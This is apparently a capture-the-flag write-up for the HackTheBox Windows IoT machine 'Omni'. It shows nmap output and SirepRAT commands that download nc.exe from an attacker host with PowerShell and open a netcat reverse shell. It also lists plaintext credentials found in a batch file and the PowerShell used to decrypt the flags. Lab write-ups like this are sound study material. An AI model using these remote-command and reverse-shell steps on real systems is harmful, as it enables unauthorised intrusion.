Summary

Omni, a Windows IOT box created by HackTheBox user egre55, was an overall easy difficulty box. The initial foothold was about finding SirepRAT issue on Windows IOT machines and using that to get a shell on the box. Enumerating the box, we find a bat file in C:\Program Files\WindowsPowerShell\Modules\PackageManagement using port 8080 we can get reverse shell as app user and then as Administrator.

Inital Enumeration

nmap

# Nmap 7.80 scan initiated Sun Aug 23 09:36:01 2020 as: nmap -Pn -sC -sV -oN nmap/omni 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.081s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 09:36:21 2020 -- 1 IP address (1 host up) scanned in 20.10 seconds

Which reveal it is somekind of windows server and two ports are open 135 and 8080

So Lets start with 8080

Web (PORT:8080)

Checking the page don’t reveal anything just asked for a credential.

Lets run gobuster and move to 135

MSRPC (Port:135)

Enumerating this we don’t find anything.

My current goal was to find any credential which i could use on port 8080

Lets get back to the whiteboard and look it from another angle. we know this is an windows IOT box based on Windows Device Portal.

Lets look for some exploit for that

I cloned SirepRAT and lets try that.

running

python SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'wProductType': 0, 'wServicePackMinor': 2, 'dwBuildNumber': 17763, 'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'wSuiteMask': 0, 'dwPlatformId': 2, 'wReserved': 0, 'wServicePackMajor': 1, 'dwMinorVersion': 0, 'szCSDVersion': 0}>

get us an output. Okay now we can get a revese shell by uploading nc and executing it.

Uploading ncat

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell iwr -OutFile C:\\Windows\\System32\\spool\drivers\\col
or\\nc.exe -Uri http://10.10.14.21/nc.exe"

Executing ncat

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\drivers\\color\\nc.exe 10.10.14.21 1234 -e powershell"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

which give us a reverse shell

Trying whoami didn’t work for us but we can get user by $env:UserName

Enumerating we find
an intresting file in C:\Program Files\WindowsPowerShell\Modules\PackageManagement r.bat which is creating a user

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

as you can see there are two credentials in r.bat file so using this credentials we can log-in to the web application of the machine (Remember web serer running on Port 8080)

log in via app:mesh5143

Enumerating more we check another drive

we are app now we can read user.txt file but content looks encrypted we need to decrypt it

for that we need to execute the following command

$c = Import-CliXml -Path U:\Users\app\user.txt
$c.GetNetworkCredential().Password

we got user flag now lets capture the root flag

Privilege Escalation

Remember we found two usernames in r.bat file? Let’s use the second one, the Administrator.

Close Firefox and start it again.

Login via: administrator:_1nt3rn37ofTh1nGz

Start another Netcat listener.

We get a reverse shell.

Now lets decrypt the root.txt file

$c = Import-CliXml -Path U:\Users\administrator\root.txt
$c.GetNetworkCredential().Password